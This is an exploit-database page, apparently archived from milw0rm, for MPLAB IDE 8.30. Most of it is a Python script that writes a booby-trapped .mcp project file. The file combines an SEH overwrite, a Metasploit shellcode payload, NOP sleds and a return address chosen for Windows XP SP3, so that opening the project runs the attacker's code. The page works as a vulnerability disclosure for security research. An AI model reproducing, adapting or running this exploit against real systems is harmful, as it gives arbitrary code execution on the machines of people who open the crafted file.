header-logo
Suggest Exploit
vendor:
MPLAB IDE
by:
His0k4
7.5
CVSS
HIGH
Universal Seh Overwrite Exploit
CWE
Product Name: MPLAB IDE
Affected Version From: MPLAB IDE 8.30
Affected Version To: MPLAB IDE 8.30
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Pro SP3

MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit

This exploit targets the MPLAB IDE 8.30 (.mcp) file format and performs a universal SEH overwrite. It allows an attacker to execute arbitrary code in the context of the application.

Mitigation:

Update to a patched version of MPLAB IDE or use alternative IDEs.
Source

Exploit-DB raw data:

# usage: mplab.py then open the project file :)
# Download : http://ww1.microchip.com/downloads/en/DeviceDoc/MPLAB_8.30.zip (nadli chouk fi rassi :p)
print "**************************************************************************"
print " MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit\n"
print " Refer : Secunia advisory (35054)\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print "**************************************************************************"
         	

header1 = (
"\x5b\x48\x45\x41\x44\x45\x52\x5d\x0d\x0a\x6d\x61\x67\x69\x63\x5f"
"\x63\x6f\x6f\x6b\x69\x65\x3d\x7b\x36\x36\x45\x39\x39\x42\x30\x37"
"\x2d\x45\x37\x30\x36\x2d\x34\x36\x38\x39\x2d\x39\x45\x38\x30\x2d"
"\x39\x42\x32\x35\x38\x32\x38\x39\x38\x41\x31\x33\x7d\x0d\x0a\x66"
"\x69\x6c\x65\x5f\x76\x65\x72\x73\x69\x6f\x6e\x3d\x31\x2e\x30\x0d"
"\x0a\x5b\x50\x41\x54\x48\x5f\x49\x4e\x46\x4f\x5d\x0d\x0a\x64\x69"
"\x72\x5f\x73\x72\x63\x3d\x0d\x0a\x64\x69\x72\x5f\x62\x69\x6e\x3d"
"\x0d\x0a\x64\x69\x72\x5f\x74\x6d\x70\x3d\x0d\x0a\x64\x69\x72\x5f"
"\x73\x69\x6e\x3d\x0d\x0a\x64\x69\x72\x5f\x69\x6e\x63\x3d\x0d\x0a"
"\x64\x69\x72\x5f\x6c\x69\x62\x3d\x0d\x0a\x64\x69\x72\x5f\x6c\x6b"
"\x72\x3d\x0d\x0a\x5b\x43\x41\x54\x5f\x46\x49\x4c\x54\x45\x52\x53"
"\x5d\x0d\x0a\x66\x69\x6c\x74\x65\x72\x5f\x73\x72\x63\x3d\x2a\x2e"
"\x61\x73\x6d\x0d\x0a\x66\x69\x6c\x74\x65\x72\x5f\x69\x6e\x63\x3d"
"\x2a\x2e\x68\x3b\x2a\x2e\x69\x6e\x63\x0d\x0a\x66\x69\x6c\x74\x65"
"\x72\x5f\x6f\x62\x6a\x3d\x2a\x2e\x6f\x0d\x0a\x66\x69\x6c\x74\x65"
"\x72\x5f\x6c\x69\x62\x3d\x2a\x2e\x6c\x69\x62\x0d\x0a\x66\x69\x6c"
"\x74\x65\x72\x5f\x6c\x6b\x72\x3d\x2a\x2e\x6c\x6b\x72\x0d\x0a\x5b"
"\x53\x55\x49\x54\x45\x5f\x49\x4e\x46\x4f\x5d\x0d\x0a\x73\x75\x69"
"\x74\x65\x5f\x67\x75\x69\x64\x3d\x7b\x36\x42\x33\x44\x41\x41\x37"
"\x38\x2d\x35\x39\x43\x31\x2d\x34\x36\x44\x44\x2d\x42\x36\x41\x41"
"\x2d\x44\x42\x44\x41\x45\x34\x45\x30\x36\x34\x38\x34\x7d\x0d\x0a"
"\x73\x75\x69\x74\x65\x5f\x73\x74\x61\x74\x65\x3d\x0d\x0a\x5b\x54"
"\x4f\x4f\x4c\x5f\x53\x45\x54\x54\x49\x4e\x47\x53\x5d\x0d\x0a\x54"
"\x53\x7b\x42\x46\x44\x32\x37\x46\x42\x41\x2d\x34\x41\x30\x32\x2d"
"\x34\x43\x30\x45\x2d\x41\x35\x45\x35\x2d\x42\x38\x31\x32\x46\x33"
"\x45\x37\x37\x30\x37\x43\x7d\x3d\x2f\x6f\x22")

header2 = (
"\x2e\x63\x6f\x66\x22\x0d\x0a\x54\x53\x7b\x41\x44\x45\x39\x33\x41"
"\x35\x35\x2d\x43\x37\x43\x37\x2d\x34\x44\x34\x44\x2d\x41\x34\x42"
"\x41\x2d\x35\x39\x33\x30\x35\x46\x37\x44\x30\x33\x39\x31\x7d\x3d"
"\x0d\x0a")


# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79"
"\x1f\x8c\x11\x83\xeb\xfc\xe2\xf4\x85\xf7\xc8\x11\x79\x1f\x07\x54"
"\x45\x94\xf0\x14\x01\x1e\x63\x9a\x36\x07\x07\x4e\x59\x1e\x67\x58"
"\xf2\x2b\x07\x10\x97\x2e\x4c\x88\xd5\x9b\x4c\x65\x7e\xde\x46\x1c"
"\x78\xdd\x67\xe5\x42\x4b\xa8\x15\x0c\xfa\x07\x4e\x5d\x1e\x67\x77"
"\xf2\x13\xc7\x9a\x26\x03\x8d\xfa\xf2\x03\x07\x10\x92\x96\xd0\x35"
"\x7d\xdc\xbd\xd1\x1d\x94\xcc\x21\xfc\xdf\xf4\x1d\xf2\x5f\x80\x9a"
"\x09\x03\x21\x9a\x11\x17\x67\x18\xf2\x9f\x3c\x11\x79\x1f\x07\x79"
"\x45\x40\xbd\xe7\x19\x49\x05\xe9\xfa\xdf\xf7\x41\x11\xef\x06\x15"
"\x26\x77\x14\xef\xf3\x11\xdb\xee\x9e\x7c\xed\x7d\x1a\x1f\x8c\x11")
	
buff = "\x41" * (226-len(shellcode))
next_seh = "\x74\xc9\x41\x42"
seh = "\x12\x13\x40\x00" #p/p/r MPLAB.exe
nops1 = "\x90"*20
nops2 = "\x90"*28
mshellcode = "\xE9\x47\xFF\xFF\xFF" #welli 3liya :p

exploit = header1 + buff + shellcode + nops1 + mshellcode + nops2 + next_seh + seh + header2

try:
    out_file = open("exploit.mcp",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-05-11]

Navigation

Suggest Exploit

Services By CQR